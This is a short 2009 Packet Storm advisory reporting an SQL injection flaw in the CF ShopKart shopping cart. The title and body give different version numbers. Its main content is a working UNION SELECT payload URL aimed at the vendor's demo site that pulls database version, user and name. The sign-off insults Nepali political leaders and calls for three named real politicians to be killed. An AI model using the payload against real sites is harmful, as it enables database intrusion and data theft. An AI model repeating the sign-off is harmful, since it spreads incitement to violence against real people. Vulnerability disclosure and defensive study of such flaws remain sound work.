CF Shopkart 5.3 SQL Injection

2009-09-18T00:00:00
ID PACKETSTORM:81436
Type packetstorm
Reporter learn3r
Modified 2009-09-18T00:00:00

Description

                                        
                                            `#####################################  
# CF ShopKart SQL vulnerability #  
# By learn3r hacker from Nepal #  
# damagicalhacker@gmail.com #  
#####################################  
  
Product name: CF ShopKart  
Version: 5.4 beta or may be lower  
Product home: www.cfshopkart.com  
  
Affected variable: item  
  
SQLi examples:  
http://demo.cfshopkart.com/index.cfm?carttoken=E48384J091709064002&action=ViewDetails&itemid=-928+union+all+select+concat(@@version,user(),database()),2--+  
  
Note that the results of second query are seen in the <title> tag...  
  
  
Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...  
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal  
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar  
  
By learn3r aka cyb3r lord  
Nepali Hackerz Are Not Dead!!!  
  
  
`